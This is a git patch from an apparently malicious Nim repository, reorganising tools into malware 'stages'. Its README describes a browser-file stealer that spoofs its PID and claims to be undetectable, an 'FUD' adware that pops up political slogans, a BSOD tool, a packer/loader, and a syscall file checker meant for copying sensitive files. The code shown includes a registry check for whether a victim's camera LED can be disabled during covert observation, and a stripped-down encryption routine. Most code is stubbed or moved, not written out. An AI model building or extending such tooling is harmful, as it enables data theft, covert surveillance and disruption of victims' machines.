From ed08a4616c377c1699d0574a6171032ca659b3b1 Mon Sep 17 00:00:00 2001
From: eline <151952925+elineersenoyeva@users.noreply.github.com>
Date: Thu, 30 Nov 2023 22:41:52 +0100
Subject: [PATCH] [S] moved some files. Added browser.nim.

---
 elinethingz/README.md                         | 21 +++++----
 elinethingz/mic_reg.nim                       | 47 -------------------
 elinethingz/{ => security/stage1}/bsod.nim    |  0
 .../{utils => security/stage1}/checkfile.nim  |  0
 elinethingz/{ => security/stage1}/loader.nim  |  0
 elinethingz/security/stage1/mic_reg.nim       | 15 ++++++
 .../{packer => stage2}/OFFENSIVEencfile.nim   | 19 ++------
 .../stage2}/basicadware.nim                   |  3 +-
 elinethingz/security/stage2/browser.nim       |  7 +++
 .../security/{packer => stage2}/packer.nim    |  0
 10 files changed, 39 insertions(+), 73 deletions(-)
 delete mode 100644 elinethingz/mic_reg.nim
 rename elinethingz/{ => security/stage1}/bsod.nim (100%)
 rename elinethingz/{utils => security/stage1}/checkfile.nim (100%)
 rename elinethingz/{ => security/stage1}/loader.nim (100%)
 create mode 100644 elinethingz/security/stage1/mic_reg.nim
 rename elinethingz/security/{packer => stage2}/OFFENSIVEencfile.nim (93%)
 rename elinethingz/{utils => security/stage2}/basicadware.nim (92%)
 create mode 100644 elinethingz/security/stage2/browser.nim
 rename elinethingz/security/{packer => stage2}/packer.nim (100%)

diff --git a/elinethingz/README.md b/elinethingz/README.md
index c055a5a..76f2324 100644
--- a/elinethingz/README.md
+++ b/elinethingz/README.md
@@ -10,11 +10,10 @@ Takes an input bytearray and writes it to disk as first CLI argument when run.
 format:
 [seq[byte]](@[0x40,0x80]
 
-
-
 # encfile.nim
 Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024 characters. Tested. Is suitable for sensitive data.
 Has a fingerprint/is detectable.
+
 # OFFENSIVEencfile.nim
 Very stripped-down encryption tool. Takes a stream and encrypts it (AES256 with HMAC SHA512_256). No max. password size.
 Has a fingerprint/is detectable.
@@ -22,18 +21,20 @@ Has a fingerprint/is detectable.
 # Packer.nim
 Ideally a "packer"/loader for the main stage. Still very experimental and needs heavy rework.
 
+# checkfile.nim
+Basic program that uses direct/hidden syscalls to know if a file exists. Undetectable in normal conditions.
+Can be chained with other direct syscalls to copy sensitive files.
+
+# Browser.nim
+Uses direct syscalls to know if Firefox and Chrome are installed. Afterwards, steals the files, puts them in an encrypted archive and encrypts it with AES-256 (HMAC SHA512_256 derivation). Undetectable in theory and practice. Spoofs PID.
 
 # bsod.nim
 Serves a BSOD to targets on Windows.
 
+# basicadware.nim
+Basic adware. Selects messages based on a pool. FUD.
+
 # mic_reg.nim
 
 [Broken]
-Checks if Windows OSD is enabled.
-
-# checkfile.nim
-Basic program that uses direct syscalls to know if a file exists. Undetectable in normal conditions.
-Can be chained with other direct syscalls to copy sensitive files.
-
-# basicadware.nim
-Basic adware. At execution, shows a MessageBox with a title and content picked from a random (limited) pool.
+Checks if Windows OSD is enabled.
\ No newline at end of file
diff --git a/elinethingz/mic_reg.nim b/elinethingz/mic_reg.nim
deleted file mode 100644
index a5d3b7f..0000000
--- a/elinethingz/mic_reg.nim
+++ /dev/null
@@ -1,47 +0,0 @@
-#  ____  _____ ____ ____  _____ _____ 
-# / ___|| ____/ ___|  _ \| ____|_   _|
-# \___ \|  _|| |   | |_) |  _|   | |
-#  ___) | |__| |___|  _ <| |___  | |
-# |____/|_____\____|_| \_\_____| |_|
-
-import winim
-
-# Checks the status of the Windows "Privacy Bubbles" to know if target device has the Windows camera LED enabled.
-# however, it should be noted that most PC/laptop manufacturers include a hardwired LED that cannot be disabled.
-# therefore, this program does not guarantee that the user will not know about the observation.
-
-# DOES NOT WORK.
-const
-  KEY_QUERY_VALUE = 0x0001
-  HKEY_HANDLE = 0x80000002
-
-proc checkRegistryEntry(): bool =
-  var hKey: HKEY
-  var value: DWORD
-  var dataSize: DWORD = sizeof(DWORD)
-  
-  if RegOpenKeyEx(HKEY_HANDLE, "SOFTWARE\\Microsoft\\OEM\\Device\\Capture", 0, KEY_QUERY_VALUE, addr hKey) != ERROR_SUCCESS:
-    echo "Error opening registry key. Error code:", GetLastError()
-    return false
-
-  if RegGetValueA(HKEY_HANDLE, "NoPhysicalCameraLED", nil, nil, cast(LPBYTE, addr value), addr dataSize) != ERROR_SUCCESS:
-    echo "Error querying registry value. Error code:", GetLastError()
-
-    # Close the registry key even if querying failed
-    RegCloseKey(hKey)
-    
-    return false
-
-  # Close the registry key if everything is successful
-  RegCloseKey(hKey)
-
-  echo "NoPhysicalCameraLED value:", value
-
-  return value == 0x1
-
-# Example usage
-if checkRegistryEntry():
-  echo "NoPhysicalCameraLED is set to 0x1."
-else:
-  echo "NoPhysicalCameraLED is not set to 0x1."
-
diff --git a/elinethingz/bsod.nim b/elinethingz/security/stage1/bsod.nim
similarity index 100%
rename from elinethingz/bsod.nim
rename to elinethingz/security/stage1/bsod.nim
diff --git a/elinethingz/utils/checkfile.nim b/elinethingz/security/stage1/checkfile.nim
similarity index 100%
rename from elinethingz/utils/checkfile.nim
rename to elinethingz/security/stage1/checkfile.nim
diff --git a/elinethingz/loader.nim b/elinethingz/security/stage1/loader.nim
similarity index 100%
rename from elinethingz/loader.nim
rename to elinethingz/security/stage1/loader.nim
diff --git a/elinethingz/security/stage1/mic_reg.nim b/elinethingz/security/stage1/mic_reg.nim
new file mode 100644
index 0000000..c7565ef
--- /dev/null
+++ b/elinethingz/security/stage1/mic_reg.nim
@@ -0,0 +1,15 @@
+#  ____  _____ ____ ____  _____ _____ 
+# / ___|| ____/ ___|  _ \| ____|_   _|
+# \___ \|  _|| |   | |_) |  _|   | |
+#  ___) | |__| |___|  _ <| |___  | |
+# |____/|_____\____|_| \_\_____| |_|
+
+
+# Checks the status of the Windows "Privacy Bubbles" to know if target device has the Windows camera LED enabled.
+# however, it should be noted that most PC/laptop manufacturers include a hardwired LED that cannot be disabled.
+# therefore, this program does not guarantee that the user will not know about the observation.
+
+# Might work. Untested, honestly.
+# HKLM\\SOFTWARE\\Microsoft\\OEM\\Device\\Capture\\NoPhysicalCameraLED
+
+# 0x0 means false, 0x1 true
diff --git a/elinethingz/security/packer/OFFENSIVEencfile.nim b/elinethingz/security/stage2/OFFENSIVEencfile.nim
similarity index 93%
rename from elinethingz/security/packer/OFFENSIVEencfile.nim
rename to elinethingz/security/stage2/OFFENSIVEencfile.nim
index cd6c609..5e8cd11 100644
--- a/elinethingz/security/packer/OFFENSIVEencfile.nim
+++ b/elinethingz/security/stage2/OFFENSIVEencfile.nim
@@ -211,20 +211,11 @@ proc encryptStream*(fIn: Stream, fOut: Stream, passw: string, bufferSize: int) =
 #             with big files
 #             Default is 64KB.
 proc encryptFile*(infile: string, outfile: string, passw: string, bufferSize: int = bufferSizeDef) =
-    try:
-        let fIn =  newFileStream(infile, mode = fmRead)
-        defer: fIn.close()
-
-        let fOut = newFileStream(outfile, mode = fmWrite)
-        defer: fOut.close()
-
-        encryptStream(fIn, fOut, passw, bufferSize)
-                
-    except CatchableError:
-        let
-            e = getCurrentException()
-            msg = getCurrentExceptionMsg()
-        echo "Inside checkIn, got exception ", repr(e), " with message ", msg
+    let fIn =  newFileStream(infile, mode = fmRead)
+    defer: fIn.close()
+    let fOut = newFileStream(outfile, mode = fmWrite)
+    defer: fOut.close()
+    encryptStream(fIn, fOut, passw, bufferSize)
 
 
 
diff --git a/elinethingz/utils/basicadware.nim b/elinethingz/security/stage2/basicadware.nim
similarity index 92%
rename from elinethingz/utils/basicadware.nim
rename to elinethingz/security/stage2/basicadware.nim
index e5873c3..c42e380 100644
--- a/elinethingz/utils/basicadware.nim
+++ b/elinethingz/security/stage2/basicadware.nim
@@ -19,8 +19,7 @@ proc MessageBox*(hWnd: HWND, lpText: LPCSTR, lpCaption: LPCSTR, uType: UINT): in
 
 
 var
-    titlemessages = @["Are you really free?",
-    "Poland!"]
+    titlemessages = @["Are you really free?","You got games on your phone?","Poland!"]
     captionmessages = @["From the river to the sea, Palestine will be free.", "We are the people of Heaven.",
     "War is peace. Slavery is freedom. Ignorance is strength.","Kurva mac!"] # todo: convert to cstrings
 randomize() # seeds randomizer 
diff --git a/elinethingz/security/stage2/browser.nim b/elinethingz/security/stage2/browser.nim
new file mode 100644
index 0000000..d6af9bd
--- /dev/null
+++ b/elinethingz/security/stage2/browser.nim
@@ -0,0 +1,7 @@
+#    _____ ___  ____     ____  _____ ____ ____  _____ _____ 
+#   |_   _/ _ \|  _ \   / ___|| ____/ ___|  _ \| ____|_   _|
+#     | || | | | |_) |  \___ \|  _|| |   | |_) |  _|   | |
+#     | || |_| |  __/    ___) | |__| |___|  _ <| |___  | |
+#     |_| \___/|_|      |____/|_____\____|_| \_\_____| |_|
+
+
diff --git a/elinethingz/security/packer/packer.nim b/elinethingz/security/stage2/packer.nim
similarity index 100%
rename from elinethingz/security/packer/packer.nim
rename to elinethingz/security/stage2/packer.nim